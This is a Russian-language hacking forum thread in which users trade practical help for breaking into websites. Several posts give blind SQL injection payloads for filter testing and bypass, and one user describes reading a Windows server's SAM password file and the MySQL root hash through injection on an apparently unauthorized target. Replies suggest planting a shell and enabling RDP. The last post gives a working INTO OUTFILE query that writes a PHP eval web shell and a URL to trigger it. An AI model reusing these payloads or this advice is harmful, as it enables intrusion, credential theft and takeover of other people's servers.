Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ну так сначала проверь версию, если не 5ая, то нету этой таблицы, есть 5ая, то проверь на доступность, бывает всякое.
     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну как бы я не настолько туп, чтобы спрашивать не проверив версию
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    посимвольно в тулзе какой нить пробуй..
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    причём тут посимвольно? посимвольно я и ручками могу) тут же в другом дело: я не могу определить то ли доступ к information_schema закрыт, то ли from фильтруется
     
  5. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    кто нибудь знает способ заливки шелла в дле 9.0?
     
  6. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Seravin

    Допустим, запрос выглядит так:
    Code:
    id=if(ascii((select version()))=53,1,0) -- 1
    Проверить на фильтрацию from можно двумя способами:

    1) Поставить слово после комментария.
    Code:
    id=if(ascii((select version()))=53,1,0) -- 1 from
    Если возвращается false, то from фильтруется

    2) Запрос вида
    Code:
    id=if(ascii((select version() from (select 1)a))=53,1,0) -- 1
    Если возвращает false (Либо нечто отличное от первого запроса, то тогда from фильтруется)
     
    3 people like this.
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    2kamaz

    когда пишешь:
    id = 1 -- работает
    id = 1 -- 1 редирект
    там както url обрабатывается ещё, т.к. когда id = 1 #, он пишет id=1/#/
    я чёт хз чё они там вообще делают(
     
  8. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Слепую скулю можно раскручивать, вообще не используя комментарии. Так что, если сайт ругается, то используй второй запрос. Для него комментарий не обязателен.

    А вместо id=1 # следует писать id=1%23
    Это так, к слову)
     
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    2kamaz
    сори, не обратил внимания) значит, походу фильтруется from. Какие есть способы это обойти, кроме
    FrOM(пробовал)
    /*!from*/ (тоже не пойдёт, используется mod_rewrite походу)
     
  10. Monsieur

    Monsieur New Member

    Joined:
    17 Jan 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    У меня вопрос про UDP(прочитал сейчас статейку про DDOS). И там было написано примерное следующее:
    При TCP flood атаке нужно подключение к атакуемому серверу, а при UDP - не нужно. Залез на Вики,там тоже написано,что протокол UDP не требует подключения.
    И вот такой вопрос: как можно ДДосить цель,не подключаясь к ней? В чем тогда заключается сама суть UDP атаки?
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    разница в протаколах tcp и udp в том что, для отправки данных между 2 хостами (через tcp) нужно сначало создать соединение(ну там icmp запросы и тп).
    а для передачы данных через протокол udp не требуется создать соединения потом отправить данные, вы по прямому отправляете пакеты на нужный хост, и в результате этого передача данных осуществляется несколько раз быстрее чем через протокол tpc
     
    _________________________
    2 people like this.
  12. Monsieur

    Monsieur New Member

    Joined:
    17 Jan 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Спасибо большое!
     
  13. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Через скуль-иньекцию в MySQL-5 вывел на страницу содержимое файла SAM от сервера под Win2003. Скопировав все эти крякозябры в текстовый файл, попытался скормить его SAMInside'у, однако этот вариант не прокатил. Каким образом можно чисто слить этот файл? Не важно из под винды или линя.
     
  14. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Знаю что есть в C:\WINDOWS\repair копия файла SAM и SYSTEM попробуй. Даже под админом нельзя кажется вытащить C:\WINDOWS\system32\config отсюда потому что системный процесс его блочит, надо загрузится под другой виндой т.е. второй или из под линукса, тогда даст скопировать.
     
    #15794 noviyuser, 6 Jan 2011
    Last edited: 6 Jan 2011
  15. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Конечно спасибо за лекцию о системе защиты файлов 'Security Account Manager' операционных систем WinNT-based и вариантов ее обхода, но я просто спросил, как можно скулей слить файл не покорежив его содержимое?) может curl'ом? Расковыряв базу mysql.user, получил пасс рута. Расшифровав его попытался подключиться к базе на порт 3306, но видимо удаленная работа с базой запрещена в настройках MySQL, поэтому этот вариант так же не прокатил. Сервак крутиться под WinServer2003, IIS6.0. Легко читаются файлы. Просмотрел my.ini и php.ini - ничего полезного... Есть еще какие нибудь полезные) файлы? Поискал на форуме по теме раскрутки скули под Win2003&IIS, но ничего подходящего не нашел. Не подскажите где можно почитать на эту тему какую нибудь статью или видео?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    что значит "не покорежив его содержимое"?
     
    _________________________
  17. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Значит идея такая. Через SQL-иньекцию прочитать файл SAM сервера, скопировать отобразившееся на странице его содержимое в Блокнот у себя, переименовать этот текстовый файл в SAM и открыть его в программе SAMInside для того чтобы заняться паролями. Проблема в том, что после копирования из браузера в Блокнот и сохранения его, SAMInside говорит, что файл битый. Видимо тут какие-то траблы с кодировкой либо при отображении в браузере, либо при сохранении в текстовик.
     
  18. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    Пробуй вытащить с папки Repair (старый файл до смени пароля) мб поможет а сам SAM файл получить не получится он занять и открыть тоже не выйдет....имхо
    пробуй залиться (если права хватит) и поднять RDP так проще будет ..
     
    _________________________
  19. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Люююди! Товарищи! Родимые! ААААаааа! Я ЧИТАЮ ФАЙЛ ИМЕННО ИЗ ПАПКИ C:\WINDOWS\REPAIR\! Я ЗНАЮ, ЧТО ИЗ ПАПКИ C:\WINDOWS\SYSTEM32\CONFIG\ ЕГО НЕ ВЫТАЩИТЬ, ПОТОМУ ЧТО ОН ОТКРЫТ СИСТЕМОЙ! Уже второй человек мне об этом говорит! Я же упомянул выше, что я знаю, что нужно открывать именно C:\WINDOWS\repair\SAM. Праздники же закончились! :(
    Подскажи, пожалуйста, где почитать о "заливке и поднятии RDP" посредством SQL-иньекции в скрипте находящегося под управлением MySQL5 базирующемся на Windows Server 2003? Спасибо!
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Через MySQL залить можно, а вот выполнить нет.
    Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так
    Code:
    SELECT c FROM t UNION ALL SELECT '<?php eval($_GET[ev]);?>' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение'
    и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo();
    Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.
     
    _________________________
    #15800 Expl0ited, 6 Jan 2011
    Last edited: 6 Jan 2011
    2 people like this.
Thread Status:
Not open for further replies.